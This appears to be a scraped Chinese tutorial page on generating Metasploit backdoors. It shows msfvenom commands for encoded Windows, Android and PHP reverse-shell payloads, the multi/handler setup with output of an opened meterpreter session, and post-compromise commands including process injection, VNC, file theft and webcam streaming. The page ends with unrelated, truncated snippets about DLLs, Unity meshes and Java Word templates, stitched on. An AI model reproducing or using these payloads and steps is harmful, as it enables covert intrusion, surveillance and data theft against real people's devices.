生成windows後門
1.首先生成後門
[root@localhost ~]#msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe
2.進入metasploit,執行以下操作
msf > use exploit/multi/handlermsf exploit(multi/handler) >
msf exploit(multi/handler) > set payload windows/meterpreter/
reverse_tcppayload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25msf exploit(multi/handler) > set lport 6666lport => 6666
msf exploit(multi/handler) >exploit[*] started reverse tcp handler on 192.168.1.25:6666[*] sending stage (179779 bytes) to 192.168.1.10[*] meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400
3.將我們的(lyshark.exe)拷貝到目標主機並執行
4.攻陷後常用查詢命令
ps #檢視程序
migrate #注入程序
run vnc #檢視遠端桌面
sessions -l #檢視會話
backgroud #退出當前會話
生成android後門
1.首先生成後門
[root@localhost ~]#msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.1 lport=6666 r > ./lyshark.apk
2.進入metasploit,執行以下操作
msf >use exploit/multi/handlermsf exploit(multi/handler) >msf exploit(multi/handler) >set payload android/meterpreter/reverse_tcppayload => android/meterpreter/reverse_tcpmsf exploit(multi/handler) >set lhost 192.168.1.1lhost => 192.168.1.1
msf exploit(multi/handler) >set lport 6666lport => 6666
msf exploit(multi/handler) >exploit[-] handler failed to bind to 192.168.1.1:6666:- -[*] started reverse tcp handler on 0.0.0.0:6666
3.將我們的(lyshark.apk)拷貝到目標主機並執行
4.此時主機已經淪陷,檢視一下系統吧
常用命令:search #搜尋 search -f *.jpg
download
webcam_stream -i 1/2
#開啟前置或後置攝像頭
check_root #檢測root
生成php後門
1.首先生成後門
[root@localhost ~]#msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php
2.進入metasploit,執行以下操作
msf >use exploit/multi/handlermsf exploit(multi/handler) >msf exploit(multi/handler) >set payload php/meterpreter_reverse_tcppayload => php/meterpreter_reverse_tcp
msf exploit(multi/handler) >set lhost 192.168.1.1lhost => 192.168.1.1
msf exploit(multi/handler) >set lport 6666lport => 6666
msf exploit(multi/handler) >exploit -j
[*] exploit running as background job 0
.msf exploit(multi/handler) >[-] handler failed to bind to 192.168.1.1:6666:- -[*] started reverse tcp handler on 0.0.0.0:6666
3.將我們的(lyshark.php)拷貝到目標網頁根路徑
生成shellcode
1.生成shell <-e 使用編碼 - i 編碼次數》
[root@localhost ~]#msfvenom -p windows/meterpreter/reverse_tcp lport=6666 lhost=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py
通過dll生成lib
大家知道,使用dll的時候有2種方式 第一種是 loadlibrary getprocaddress 第二種是 使用lib檔案或 pragma comment lib,yourlib.lib 有時候你只有dll和標頭檔案,沒有lib檔案,這時候要乙個個的getprocadress,很麻煩。想偷懶的話...
通過Mesh生成網格
gameobject obj new gameobject go meshfilter mf obj.addcomponent meshrenderer mr obj.addcomponent 新增乙個材質球 mr.sharedmaterial resources.load material 第乙個...
java通過模板生成 word
最近專案要匯出world的報告,在網上查閱了下相關資料。發現使用模板方式比較適合我們的專案。為自己記錄下.1.建立word文件,並另存為xml格式.3.使用模板生成 word文件.這裡簡單說下另存為後的xml模板 我使用的是word2007.如果存在,模板中會有類似這樣語法 這裡要注意的是,id不能...